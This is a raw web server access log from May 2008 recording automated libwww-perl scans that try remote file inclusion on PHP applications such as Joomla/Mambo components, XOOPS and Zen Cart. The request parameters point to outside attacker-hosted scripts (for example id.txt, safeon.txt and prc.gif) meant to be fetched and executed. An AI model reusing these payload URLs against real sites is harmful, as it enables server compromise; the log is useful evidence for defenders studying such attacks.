72.36.179.98 - - [06/May/2008:12:43:40 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:43:41 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:43 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:48 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:48 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:48 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:48 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:50 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:51 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:51 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:52 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:52 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:53 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:43:53 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:55 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:55 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:55 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:55 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:56 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:43:56 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:43:58 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:43:59 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:43:59 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:12:43:59 -0700] "GET /logs//module_db.php?pivot_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:12:44:00 -0700] "GET //module_db.php?pivot_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:44:00 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:44:01 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:44:02 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:44:02 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:44:03 -0700] "GET /logs//module_db.php?pivot_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:44:04 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:44:04 -0700] "GET //module_db.php?pivot_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:44:04 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:44:07 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:44:07 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:44:07 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:44:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:44:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:44:08 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:08 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:08 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:09 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:44:10 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:44:14 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.51.25.186 - - [06/May/2008:12:44:15 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:44:17 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:20 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:20 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:20 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:25 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:12:44:26 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:12:44:27 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:12:44:29 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [06/May/2008:12:44:30 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:44:35 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.237.76.146 - - [06/May/2008:12:44:42 -0700] "GET /logs/access_080311.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:44:42 -0700] "GET /logs/access_080129.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:44:42 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:44:42 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:44:58 -0700] "GET /logs/access_080129.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:44:58 -0700] "GET /skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:44:58 -0700] "GET /logs/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:45:03 -0700] "GET /logs/access_071228.log/skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:12:45:11 -0700] "GET /logs/index1.php?dat=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:12:45:13 -0700] "GET /logs/access_071228.log/skin/zero_vote/index.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:12:45:19 -0700] "GET /index1.php?dat=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:45:21 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:12:45:23 -0700] "GET //modify.php?dir_module=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:45:25 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:45:31 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:45:31 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:12:45:32 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:45:36 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:45:37 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:45:39 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:45:42 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:45:42 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:45:42 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:45:42 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:45:42 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:45:42 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:45:44 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:45:44 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:45:45 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:45:49 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:45:49 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [06/May/2008:12:45:50 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:45:51 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.64.29 - - [06/May/2008:12:45:52 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:12:45:52 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.64.29 - - [06/May/2008:12:45:52 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:45:52 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:45:55 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:45:55 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:45:55 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:45:56 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:45:57 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:12:45:57 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:46:09 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:46:09 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:46:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:46:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:46:10 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.198.9.203 - - [06/May/2008:12:46:10 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.226.179.98 - - [06/May/2008:12:46:10 -0700] "GET /logs/access_080105.log/blank.php?basepath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.226.179.98 - - [06/May/2008:12:46:10 -0700] "GET /logs/blank.php?basepath=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:46:20 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:46:20 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:46:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:46:20 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:12:46:21 -0700] "GET /logs/http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:46:21 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:12:46:21 -0700] "GET /http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:12:46:21 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:46:37 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.199.120.48 - - [06/May/2008:12:46:37 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:12:46:59 -0700] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:47:07 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.249.105.66 - - [06/May/2008:12:47:08 -0700] "GET /postscript/postscript.php?p_mode=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
